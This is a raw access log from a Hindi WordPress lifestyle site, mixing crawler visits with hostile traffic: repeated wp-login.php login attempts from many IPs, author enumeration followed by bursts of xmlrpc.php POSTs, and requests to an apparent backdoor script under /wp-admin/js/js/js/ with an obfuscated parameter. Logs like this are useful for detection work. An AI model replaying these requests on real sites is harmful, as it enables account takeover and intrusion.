64.227.176.68 - - [20/Oct/2025:10:06:59 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
54.37.96.153 - - [20/Oct/2025:10:07:00 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.96.195 - - [20/Oct/2025:10:06:59 -0400] "GET /tag/tips-to-get-rid-of-kidney-stone-in-hindi/ HTTP/2.0" 200 149597 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.37.96.153 - - [20/Oct/2025:10:07:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:07:08 -0400] "GET /tag/are-some-vitamins-bad-for-pregnancy/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:10:04:44 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937323638342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393038342q6465626236323932386364653466343462646633633332383038333931666632222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:10:07:10 -0400] "GET /tag/are-some-vitamins-bad-for-pregnancy/feed/ HTTP/2.0" 200 18550 "https://hindi.blushin.com/tag/are-some-vitamins-bad-for-pregnancy/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.254.39.130 - - [20/Oct/2025:10:07:13 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
2a03:2880:f800:25:: - - [20/Oct/2025:10:07:13 -0400] "GET /tag/minerals-to-make-you-healthier/ HTTP/2.0" 200 149485 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.254.39.130 - - [20/Oct/2025:10:07:15 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.120.100 - - [20/Oct/2025:10:07:18 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.120.100 - - [20/Oct/2025:10:07:19 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
144.124.224.115 - - [20/Oct/2025:10:07:20 -0400] "GET /how-to-get-rid-of-tanning-with-cucumber-scrub/ HTTP/2.0" 200 310771 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
165.232.131.12 - - [20/Oct/2025:10:07:23 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
165.232.131.12 - - [20/Oct/2025:10:07:24 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
97.74.90.22 - - [20/Oct/2025:10:07:27 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
97.74.90.22 - - [20/Oct/2025:10:07:28 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.10 - - [20/Oct/2025:10:07:28 -0400] "GET /tag/real-life-couples-in-hindi-serials/ HTTP/2.0" 200 152445 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:10:07:30 -0400] "GET /tag/%e0%a4%b9%e0%a4%b2%e0%a5%8d%e0%a4%a6%e0%a5%80-%e0%a4%a6%e0%a5%82%e0%a4%a7 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:10:05:06 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937323730362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393130362q3166353366646366306464616265643039613266386364663865373064373662222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
87.250.224.217 - - [20/Oct/2025:10:07:31 -0400] "GET /peepal-tree-has-got-health-benefits/peepal-tree-use3/ HTTP/2.0" 200 150639 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
216.73.216.143 - - [20/Oct/2025:10:07:32 -0400] "GET /tag/%e0%a4%b9%e0%a4%b2%e0%a5%8d%e0%a4%a6%e0%a5%80-%e0%a4%a6%e0%a5%82%e0%a4%a7/ HTTP/2.0" 200 149447 "https://hindi.blushin.com/tag/%e0%a4%b9%e0%a4%b2%e0%a5%8d%e0%a4%a6%e0%a5%80-%e0%a4%a6%e0%a5%82%e0%a4%a7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:07:36 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
85.208.96.200 - - [20/Oct/2025:10:07:35 -0400] "GET /tag/soya-chunks-helps-get-rid-of-many-skin-problems/ HTTP/2.0" 200 149968 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:07:36 -0400] "GET /?author=1 HTTP/2.0" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:07:38 -0400] "GET /?author=2 HTTP/2.0" 200 148453 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:07:40 -0400] "GET /?author=3 HTTP/2.0" 404 164295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.191.171.12 - - [20/Oct/2025:10:07:42 -0400] "GET /tag/grapeseed-oil/ HTTP/2.0" 200 149585 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:07:43 -0400] "GET /?author=4 HTTP/2.0" 404 164295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:07:46 -0400] "GET /?author=5 HTTP/2.0" 404 164295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:07:49 -0400] "POST /wp-login.php HTTP/2.0" 200 7092 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
82.64.157.6 - - [20/Oct/2025:10:07:50 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:07:50 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
82.64.157.6 - - [20/Oct/2025:10:07:51 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:07:51 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:07:51 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:07:52 -0400] "POST /xmlrpc.php HTTP/2.0" 200 2327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:07:53 -0400] "POST /xmlrpc.php HTTP/2.0" 200 2327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
2a03:2880:f800:3c:: - - [20/Oct/2025:10:07:52 -0400] "GET /tag/namak/ HTTP/2.0" 200 149494 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.143 - - [20/Oct/2025:10:07:53 -0400] "GET /tag/ways-to-be-more-beautiful/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:07:55 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:05:28 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937323732382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393132382q3230663666336437326361666130353932636661353765666435313732383863222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
162.0.235.233 - - [20/Oct/2025:10:07:55 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:07:55 -0400] "GET /tag/ways-to-be-more-beautiful/feed/ HTTP/2.0" 200 26575 "https://hindi.blushin.com/tag/ways-to-be-more-beautiful/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:07:56 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
162.0.235.233 - - [20/Oct/2025:10:07:56 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:07:57 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
85.208.96.207 - - [20/Oct/2025:10:07:56 -0400] "GET /tag/take-care-tips-for-nails/ HTTP/2.0" 200 149402 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
97.74.90.22 - - [20/Oct/2025:10:08:00 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:00 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
97.74.90.22 - - [20/Oct/2025:10:08:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:02 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:04 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
89.117.74.114 - - [20/Oct/2025:10:08:04 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:08:04 -0400] "GET /home-remedies-to-get-rid-of-hand-and-legs-tanning HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
89.117.74.114 - - [20/Oct/2025:10:08:05 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:06 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:08:05 -0400] "GET /home-remedies-to-get-rid-of-hand-and-legs-tanning/ HTTP/2.0" 200 320163 "https://hindi.blushin.com/home-remedies-to-get-rid-of-hand-and-legs-tanning" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.29.141.50 - - [20/Oct/2025:10:08:07 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.29.141.50 - - [20/Oct/2025:10:08:08 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:10 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
192.64.118.67 - - [20/Oct/2025:10:08:11 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
184.94.213.100 - - [20/Oct/2025:10:08:11 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
192.64.118.67 - - [20/Oct/2025:10:08:11 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:12 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:13 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
184.94.213.100 - - [20/Oct/2025:10:08:14 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:14 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:05:51 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937323735312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393135312q3038303738326463633138383831393166373433663964326334646237383039222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:10:08:17 -0400] "GET /tag/kurti-palazzos/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:08:18 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:19 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.73.216.143 - - [20/Oct/2025:10:08:19 -0400] "GET /tag/kurti-palazzos/feed/ HTTP/2.0" 200 14202 "https://hindi.blushin.com/tag/kurti-palazzos/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.0.229.206 - - [20/Oct/2025:10:08:20 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:20 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
162.0.229.206 - - [20/Oct/2025:10:08:22 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:23 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:26 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.153.42.48 - - [20/Oct/2025:10:08:26 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:27 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
85.208.96.208 - - [20/Oct/2025:10:08:26 -0400] "GET /tag/pavanamuktasana-yoga/ HTTP/2.0" 200 149496 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:08:28 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:29 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:30 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.153.42.48 - - [20/Oct/2025:10:08:32 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:08:33 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:08:35 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
2a03:2880:f800:2c:: - - [20/Oct/2025:10:08:34 -0400] "GET /chinese-fried-rice-recipe/ HTTP/2.0" 200 307702 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
193.142.147.5 - - [20/Oct/2025:10:08:39 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
162.0.209.186 - - [20/Oct/2025:10:08:39 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:10:06:13 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937323737332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393137332q3839313039373565373266623730313166643439653839616230383661343031222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
185.191.171.15 - - [20/Oct/2025:10:08:38 -0400] "GET /tag/10th-day-of-navratri/ HTTP/2.0" 200 152201 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:08:40 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
162.0.209.186 - - [20/Oct/2025:10:08:40 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
52.167.144.145 - - [20/Oct/2025:10:08:38 -0400] "GET /tips-to-keep-in-mind-if-you-have-sensitive-skin.html/tips-to-keep-in-mind-if-you-have-sensitive-skin3 HTTP/2.0" 200 200847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
